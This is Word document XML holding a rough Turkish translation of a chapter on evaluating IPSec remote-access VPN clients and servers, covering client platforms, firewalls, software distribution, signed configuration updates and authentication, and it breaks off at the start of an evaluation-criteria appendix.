    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0061003E">
        <w:t>Özellik gereksinimlerine göre ürünleri test edin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0061003E">
        <w:t>Bir pilot program uygulayın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F331D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>İstemci Yazılımı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Uzaktan erişim kullanıcıları arasında telekomünikasyon cihazları, mobil çalışanlar, seyahat eden çalışanlar ve verilere erişilen şirketin çalışanı olan herhangi bir kişi bulunur. En sık kullanılan işletim sistemleri MS'dir. Windows tabanlı, kurumsal bir masaüstü standardı olarak pazar kabulünden dolayı. IPSec VPN sistem gereksinimleri Macintosh, UNIX, PalmOS veya Microsoft Pocket PC / gibi diğer işletim sistemleri için destek gösterebilir. Windows CE. Tercihen, IPSec VPN satıcısı, şirket tarafından istenen müşteri tiplerinin bir karışımını sunar. Mobil çalışanlar bazen satış tahminleri, gizli hasta veya yasal bilgiler, müşteri listeleri ve hassas ancak sınıflandırılmamış DoD veya yasa uygulama bilgileri gibi yüksek değerli / yüksek riskli kurumsal verilere erişmeye ihtiyaç duyarlar.</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED64CA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Uzaktan erişim ayrıca İnternet üzerinden bilgi işbirliği için eşler arası erişim anlamına da gelebilir (örneğin, Microsoft NetMeeting) ve uzaktan teknik destek için de kullanılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bu uygulama için istemci donanım platformları PDA'lar, dizüstü bilgisayarlar, ev masaüstü bilgisayarları, çağrı cihazları, verileri zaten içerir cep telefonları ve diğer kablolu ve kablosuz ağ bağlantılı cihazlar. </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED64CA">
        <w:t>Donanım platformu teknolojisi geliştikçe, şirket verilerine uzaktan erişmek için kullanılabilecek başka cihazlar olacağından emin olabilirsiniz. Popülerl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">iği artıran ilginç bir fenomen, </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED64CA">
        <w:t>kişisel dijital asistanlar, cep telefonları ve diğer yüksek portatif ağ özellikli cihazlar gibi kablosuz cihazların uzaktan erişim IPSec VPN uygulamaları için erişim platformları olarak kullanılmasıdır.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kablosuz cihazların karşılaştığı sorunlar, kablolu IPSec VPN platformlarının karşılaştığı temel sorunları içerir. Fiziksel olarak güvenlik ve veri güvenliği gibi, işlemsel olarak zorlu cihazlarda şifreleme uygulama sorunu da eklendi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>PDA'lar gibi kablosuz IPSec VPN platformlarıyla ilgili başka bir sorun, kablolu dünya güvenliği ile uyumluluk protokolleridir. Kablosuz protokollerin standart bir organı olan Kablosuz Uygulama Protokolü (WAP) Forumu çalışıyor WAP tanımlı güvenlik protokolü arasındaki uyumluluğu geliştirmek için - Wireless Transport Layer Security (WTLS) - ve SSL gibi kablolu dünya güvenlik protokolleri. Endüstri gözlemcileri, PDA'lar ve verilere hazır cep telefonları gibi kablosuz cihazların, uzaktan işlemsel veri erişimi gerektiren uygulamalar için tercih edilen platform olacağını tahmin ediyor. Ancak, bu cihazlar küçüktür ve kolayca çalınabilir veya kaybolabilir. Bu, IPSec VPN istemci yazılımının özelliklerini analiz ederken, değerlendirme ölçütlerinin bir parçası olarak donanım platformu fiziksel güvenliğini dahil etme ihtiyacını vurgulamaktadır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED64CA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Bu platformlar için fiziksel güvenlik kontrolleri kabloları içerebilir ve kilitler, seri numarası takibi, hareket sensörleri, konum tabanlı takip (Global Konumlandırma kullanımı ile (Sistemler) ve ses doğrulaması ile parmak taraması gibi biyometrik kimlik doğrulaması.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED64CA">
        <w:t>Uzaktan erişim için iletişim aktarımı ağırlıklı olarak çevirmeli bağlantı yoluyla olmaya devam ediyor. Kablosuz ve geniş bantlı erişim kullanımda büyümeye devam ediyor. Bununla birlikte, geniş bant uygulamalarındaki ve belirli coğrafi kısıtlamalardaki erken karmaşıklıklar son zamanlarda azaltılmıştır ve çevirmeli kullanımın ötesinde kullanımda geniş bant ve kablosuz kullanımın artması muhtemeldir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Geniş bantlı (DSL, kablo modem) kullanımındaki bir sorun, meta haline geldiğinden, geniş bant sağlayıcılarının izin verilen hizmetleri ağlarında bölümlere ayırmaya çalışmalarıdır. İnternet erişimi sağlayan kablolu servisler tarafından kullanılan bir taktik, ev kullanıcıları tarafından IPSec VPN'lerin kullanılmasını yasaklamaktır. Bir kablo şirketine göre, ABD Batı Kıyısı'na dayanarak, konut IPSec VPN kullanıcılarının oluşturduğu genel gider ağı, diğer ev tabanlı kullanıcılar için mevcut bant genişliğini etkiliyordu. </w:t>
      </w:r>
      <w:r w:rsidRPr="003D652E">
        <w:t>Bu nedenle, bu kablo şirketi, tüm VPN'lerin, kablo modemde port ve protokol paket filtre kuralları kullanılarak konut servis müşterileri tarafından kullanılmasını yasaklamıştı. Açıkçası, bu kablo şirketine fayda sağlıyor çünkü VPN'leri evden İnternet üzerinden yönlendirmek için daha yüksek işletme sınıfı ücretleri talep edebiliyor.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bazı tescilli VPN çözümleri satıcıları, örneğin bu kablo şirketi kısıtlamasını atlamak için VPN yüklerini izin verilen protokollere, örneğin HTTP paketlerinde kapsüllenerek kullanarak cevap verdiler. Bu sorunun nasıl çözüleceği hala görülmeye devam ediyor, ancak bir VPN seçerken başka bir kriter belirledi: Son kullanıcının ISS veya ağ erişim sağlayıcı ağı üzerinden mi çalışacak? Uzaktaki son kullanıcılar kendi mesken sınıfı ISS'lerini kullanır mı? Yoksa şirket satın alacak Tutarlı ve güvenilir bağlantı sağlamak için işletme sınıfı erişim?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Son kullanıcılar, yapmaları için para aldıkları işi yapmaya odaklanır. Genel olarak, kullanıcılar, uzaktan erişim bağlantılarının güvenliğini gerçekten önemsemeye teşvik edilmemektedir. Kullanıcılar, öncelikle bilgisayarlarındaki mevcut uygulamalarla kullanım kolaylığı, güvenilirlik ve uyumluluk ile ilgilenmektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bu nedenle, kapsamlı bir değerlendirme stratejisinin bir parçası, VPN istemcisinin tamamen test edilmesi gerektiğidir. kullanıcılar tarafından gerçek hayatta kullanılacak olan aynı uzak platform yapılandırması. Örneğin, bazı üreticilerin kişisel güvenlik duvarı başka bir satıcının IPSec VPN istemcisiyle çakışmaya neden olabilir. Bu tür bir uyumsuzluk, satıcıyla çalışarak çözülebilir olabilir veya olmayabilir ve listeden diskalifiye edilmesiyle sonuçlanabilir. potansiyel çözümler. IPSec VPN istemcisi uyumsuzluğunun bir başka örneği, bir satıcının IPSec VPN istemcisinin IPSec VPN sunucusu veya başka bir IPSec VPN ile aynı parametreleri desteklemediği durumdur. istemcisi.  Burada akılda tutulması gereken şey, standartların genellikle asgari düzeyde zorunlu özellikler tanımlamasıdır. Satıcılar, ürünlerini farklılaştırmak amacıyla, bir standart tarafından açıkça belirtilmeyen özellikler gibi daha gelişmiş özellikler ekleyebilirler. </w:t>
      </w:r>
      <w:r w:rsidRPr="003D652E">
        <w:t>Ayrıca, satıcılar IPSec VPN istemcilerini, kendi IPSec VPN sunucularıyla en etkili şekilde çalışacak şekilde optimize edebilirler. Bu, genel IPSec VPN sisteminin güvenlik seviyesini ve performansını düşürebilecek “en düşük ortak payda” konfigürasyonunu kullanmak için karışık bir satıcı yaklaşımı bırakır.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D652E">
        <w:t>Örneğin, bazı IPSec VPN sunucu satıcıları, standartta zorunlu olarak tanımlanmayan kimlik doğrulama protokollerini destekler. Açıkçası, seçilen IPSec VPN istemcisi, IPSec VPN sunucusuyla aynı satıcıdan gelmiyorsa ve kabul edilebilir bir birlikte çalışabilirlik sağlanamıyorsa, kriterlerde veya satıcı diskalifikasyonunda bir uzlaşma yapılması gereken karar olacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">İnternet erişimi daha yaygın hale geldikçe ve aboneler daha uzun süre bağlı kaldıkça veya “her zaman”, uzak VPN kullanıcısının bilgisayarına yönelik saldırı fırsatlarında ortaya çıkan artışlar söz konusu. Bu nedenle, uzak kullanıcının bilgisayarında depolanan değerli veriler varsa, bir tür dosya veya disk şifreleme kullanmak mantıklı olabilir. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C627B7">
        <w:t>Şifreleme, işlemci yoğun bir etkinlik olduğundan, uzak bilgisayar için kullanılabilen bilgi işlem kaynaklarının artırılması gerekebilir. Buradaki amaç, taşınabilir bir bilgisayar aygıtında saklanmış olsa bile değerli verileri yetkisiz görünümden korumaktır. Bazı VPN istemci yazılımı, virüs koruması, dağıtılmış masaüstü güvenlik duvarı, masaüstü izinsiz giriş koruması ve dosya / disk şifrelemesi içerir.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bu tür bir çözüm daha fazla olabilir . belirli uygulamalar için gerekenden daha fazla, ancak bir savunma alanında bile masaüstü seviyesi. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C627B7">
        <w:t xml:space="preserve">Bu karışıma ek olarak, güçlü bir kimlik doğrulaması ve dijital imzalama ve iyi düşünülmüş bir politikanın uygulanmasının yanı sıra, politikanın doğru bir şekilde uygulanmasıyla güvenlik riski azalır. Yukarıda belirtilenler, çevirmeli bağlantı </w:t>
      </w:r>
      <w:r w:rsidRPr="00C627B7">
        <w:lastRenderedPageBreak/>
        <w:t>kullanıcıları için de geçerlidir; çevirmeli bağlantı ile ne zaman bağlanırsa, herkes kamuya açık ve dolayısıyla saldırıya açık bir IP adresi alır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VPN istemcisi bütünlüğü sorunları da dikkate alınmalıdır. Örneğin, VPN istemcisinin VPN sunucusundan bir güvenlik politikası güncellemesi veya yapılandırma güncellemesi doğrulamak mı istiyorsunuz? </w:t>
      </w:r>
      <w:r w:rsidRPr="00C627B7">
        <w:t>Güncellemenin başarıyla tamamlanması için kullanıcı bir şekilde işbirliği yapmak zorunda mı? Kullanıcılar, VPN istemcisi güncelleme işlemine dahil olmaları gerekiyorsa zincirde zayıf bir bağlantı olabilir.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kullanıcı katılımı olmadan VPN istemcisi yapılandırmasının güvenli otomatik güncellemelerine izin veren VPN istemcilerini düşünün. Antivirüs koruması, örneğin bir VPN sisteminin yetkisiz manipülasyonunu gerçekleştirme potansiyeline sahip olan bir Truva atı veya virüsünün potansiyelinden kaynaklanmaktadır.  VPN istemcisi masaüstü antivirüs programlarıyla uyumlu mu (veya içeriyor mu)? Bir artışa şahit oluyoruz Hedefe yönelik saldırılarda, saldırganın kör bir şekilde arama yapmak yerine belirli bir sebepten dolayı hedefleri seçtiği yer savunmasız bir ev sahibi için. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C627B7">
        <w:t>Bu tür saldırılar, saldırganların VPN giriş noktaları aracılığıyla koordine etme ve saldırma yeteneklerini içerir. Bu, uzak VPN kullanıcı bağlantılarını sistematik olarak merkezi siteye yönlendiren kararlı bir saldırgan için olasıdır. Bu nedenle, VPN istemcisini dağıtılmış masaüstü güvenlik duvarları ve masaüstü izinsiz giriş tespit sistemleri kullanarak yıkılmaya karşı koruma gereksinimi olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Dağıtılmış bir masaüstü güvenlik duvarının ana ayırt edici özelliği, bir kuruluştaki tüm masaüstleri için güvenlik duvarı politikasının merkezi bir konsoldan yönetilmesidir. Kişisel güvenlik duvarları, adından da anlaşılacağı gibi, bireysel tüketicilere pazarlanmaktadır. Bireysel kullanıcı, kişisel güvenlik duvarlarındaki politikaların korunmasından sorumludur. Dağıtılmış bir güvenlik duvarı, uzak VPN kullanıcı bağlantısı da dahil olmak üzere, tüm giriş noktalarında dahili ağa tutarlı bir ağ güvenliği politikasını merkezi olarak uygulamak zorunda olan işletmelere pazarlanır. Bir IPSec VPN istemcisini, dağıtılmış bir güvenlik duvarı ve tekrar raporlayan izinsiz giriş tespit sistemi ile birlikte dağıtarak merkezi bir yönetim konsolu, devam eden ağ saldırıları, güvenlik duruşunun kurumsal bir görünümünü sağlamak için birleştirilebilir ve ilişkilendirilebilir. İdeal olarak, bir IPSec satıcısı antivirüs içeren bir VPN istemcisi sağlayabilir,masaüstü izinsiz giriş tespiti ve IPSec VPN istemcisi ile birlikte dağıtılmış bir güvenlik duvarı. Bu düzeyde bir entegrasyon sağlayan bir ürün, kesinlikle masaüstü güvenlik politikası yönetiminin etkinliğini artıracaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C0F89">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>İstemciyi Dağıtma</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001C0F89">
        <w:t>Uzaktan erişim VPN istemci yazılımı dağıtım sorunları, öncelikle herhangi biriyle ortaya çıkan operasyonel konulardır. dağıtılmış yazılım, bu tür SQL istemci yazılımı. Çok geniş bir yazılım yönetimi bilgisi vardır. ve uzaktan erişim VPN istemci yazılımını dağıtmaya uyarlanabilecek metodolojiler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bir VPN istemcisinin konuşlandırılabilirliğini incelerken birkaç sorunun çözülmesi gerekir. Böyle bir konu VPN istemci yazılımı dosya boyutu. Seçilen istemci yazılımı dağıtım modu, şu anda en yaygın kullanılan uzaktan erişim yöntemi olan düşük hızlı çevirmeli bağlantı üzerinden gerçekleştiriliyorsa, bu önemli bir sorun haline gelir. </w:t>
      </w:r>
      <w:r w:rsidRPr="000C735C">
        <w:t>Dosyanın bir dağıtım FTP sunucusundan indirilmesi çok uzun sürerse, etkilenen kullanıcıların dosyayı veya gelecekteki güncellemeleri indirmeye dirençli olması olasıdır.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dayanıklı kullanıcılar, uzun süren uygulama olasılığını artırabilir VPN'in toplam uygulama maliyeti artar.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C735C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ancak, yaygın yüksek hızlı erişim vaadi ufukta. Bu sorunu çözebilecek bir dağıtım stratejisi, VPN istemcisini başlangıçta disket veya CD-ROM gibi taşınabilir ortamlar tarafından dağıtmaktır. Veri sıkıştırma, VPN istemcisi dağıtım boyutunu daraltmanıza yardımcı olabilir. Çoğu satıcı, yöneticinin bazı başlangıç ​​ayarlarını önceden yapılandırmasını ve ardından yükleme dosyasını her bir uzak kullanıcıya dağıtmasını sağlayan bir tür istemci yapılandırma yardımcı programı sağlar. Olası VPN müşteri dağıtımı yöntemler bir Web veya FTP sitesine göndermeyi içerir. Web, FTP veya başka bir çevrimiçi dosya aktarma yöntemi kullanılıyorsa, güvenlik uzmanının VPN istemcisi yükleme dosyasına yetkisiz erişim </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>olgusu içeren olası senaryoları öngörmesi önemlidir. Bazı şirketler kurulum dosyalarını sadece şahsen dağıtmalarına karar verebilir. Diğerleri posta veya elektronik posta yoluyla dağıtım riskini kabul etmeye hazırdır. Diğerleri, güvenli bir dosya aktarım sitesi kurmayı, bir PIN veya özel bir parola kullanarak erişim sağlamayı seçebilir. Ne zaman VPN müşterisinin ilk dağıtımına gelince, olasılıklar ancak ihlal edildiğinde zararın değerine bağlı olarak kabul edilebilir risk seviyesi ile sınırlıdır. Bu, özellikle ilk VPN istemci yazılımının, saldırgan tarafından keşif bilgisi olarak kullanılabilecek bilgilerle önceden yapılandırılmış olması durumunda geçerlidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000C735C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C735C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Müşteri Yönetimi Sorunları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>VPN müşteri yönetimi, müşteri konfigürasyonunun operasyonel bakımı, VPN müşteri politikası güncelleme işlemi ve VPN istemci yazılımının güncellenmesi ile ilgilidir. Yine, bugün işletmeler tarafından dağıtılan diğer yazılım türlerini yönetmek için kullanılan genel bilgi ve yazılım yönetimi metodolojilerinden uyarlanabilecek birçok yaklaşım vardır. Ek faktörler güncellemelerin kullanıcı kimlik doğrulaması, VPN kullanılabilirlik, güncelleme dosyası bütünlüğü ve gizlilik. Kullanıcı kimlik bilgilerini yönetme yeteneği, VPN sunucusu yönetimi ile ilgili bölüm.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34656">
        <w:t>VPN istemcisi, iç ağda başka bir erişim noktasını temsil ettiğinden, bu erişim sıkı bir kullanıcı kimlik doğrulaması ve sıkı kontrol edilen VPN yapılandırma bilgileri gerektirir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Pek çok kişi, güçlü kimlik doğrulamanın en yüksek seviyesinin biyometrik tabanlı olduğunu iddia eder. Bir PIN birlikte kullanıldığında Biyometri ile iki faktörlü kimlik doğrulama olarak kabul edilebilir. Birçok güvenlik uzmanı tarafından bir sonraki seçenek PIN birleşimli bir akıllı kartta saklanan dijital sertifikadır.  Zamana dayalı hesap kartı (jeton) ve basit parolaların kullanılması eski kullanımlara giriyor. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D36EAA">
        <w:t>Ancak, birçok IPSec satıcısı XAUTH uzantısını IKE / IPSec standardına uyguluyor.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XAUTH uzantısı, IPSec tüneli kurulumu sırasında kullanıcı kimliğini doğrularken, şu anda kullanımda en yaygın kullanılan kimlik doğrulama yöntemi olan RADIUS gibi eski kullanıcı kimlik doğrulama yöntemlerinin kullanılmasına izin verir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000C735C">
        <w:t>VPN güncelleme sunucusunu taklit etme ihtimaline bağlı olarak dikkat edilmesi gereken bir soru, “İstemci yazılımı, yapılandırma güncelleme dosyasını aldığını nasıl onaylar?” Şeklindedir. Birçok yapılandırma dağıtım biçimiyle, saldırganın göndermesi için bir fırsat vardır. kullanıcılara yetkisiz güncelleme dosyası.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Bu tehdide karşı bir kontrol, güncellemeyi dijital olarak imzalamak için şifreleme ve dijital imza kullanımıdır kabul edilmeden önce VPN istemcisi tarafından doğrulanabilen bir dosya. Ek bir koruma Gerçek yapılandırma dosyasını, uzak kullanıcı bilgisayarında bulunan şekilde şifreleyin. Yaygın bir yöntem, güncellemeleri aktarmak için güvenli bir yol kullanmaktır; örneğin, SSL üzerinden LDAP (LDAP).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00450E73">
        <w:t>Ek 40.2, uzaktan erişim VPN istemci yazılımı için örnek bir değerlendirme profilini göstermektedir. Bu, bir VPN müşterisi için değerlendirme kriterleri geliştirirken göz önüne alınabilecek öğelerin bir listesidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00450E73">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Uzaktan Erişim Sunucusu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00450E73">
        <w:t>Şifreleme tüneli trafiğinin ana işlemesi uzaktan erişim (VPN) sunucusunda yapılır. VPN sunucusu tünel toplama noktası haline gelir: uzaktan erişim istemcisi sunucuyu tünel bitiş noktası olarak kullanır. VPN sunucusunun VPN trafiğini verimli bir şekilde işleme kapasitesine sahip olduğunu doğrulamanın iki yolu vardır.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  İlki, işlem kısıtlamalarının üstesinden gelmek için daha büyük, daha hızlı donanım cihazları kullanmaktır; yekpare donanıma dayalı çözümler doğrudan donanıma bağlı performans gelişmelerine bağlıdır. Performans geliştirmelerinin gelmesi yavaşsa, yukarı doğru ölçekleme yeteneği de artacaktır. Bu yaklaşım genellikle dikey ölçeklenebilirlik olarak adlandırılır. İkinci alternatif, bir VPN sunucusu </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">grubundaki VPN bağlantılarını yük dengelemek veya dağıtmaktır. Yük dengeleme, özel yük dengeleme donanımı veya birden fazla VPN sunucusu arasında ilke ve durum çoğaltma yoluyla özel işlemciler ve yazılımlar gerektirir. </w:t>
      </w:r>
      <w:r w:rsidRPr="00450E73">
        <w:t>Bağlantılar ve ekonomiler açısından, yük dengeli bir VPN sunucu grubu her zaman daha iyi ölçeklenebilirlik sunacaktır çünkü gerektiğinde daha fazla sunucu eklenebilir. Yük dengeleme aynı zamanda fazlalık da sağlayacaktır; Herhangi bir VPN sunucusu başarısız olursa, yük kalan VPN sunucuları arasında dağıtılacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00075CE8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ek 40.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00075CE8">
        <w:t>Uzaktan Erişim VPN İstemcisi için Değerlendirme Ölçütleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00075CE8">
        <w:t>Varsayım: VPN istemcisi merkezi sitenin yönetimine tabidir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Mobil kullanıcı masaüstünün güvenliği için dosya / disk şifrelemesi gerekebilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kapsamlı disk / dosya şifrelemesi kullanılıyorsa, yüksek performanslı dizüstü bilgisayarlar / dizüstü bilgisayarlar gerekebilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
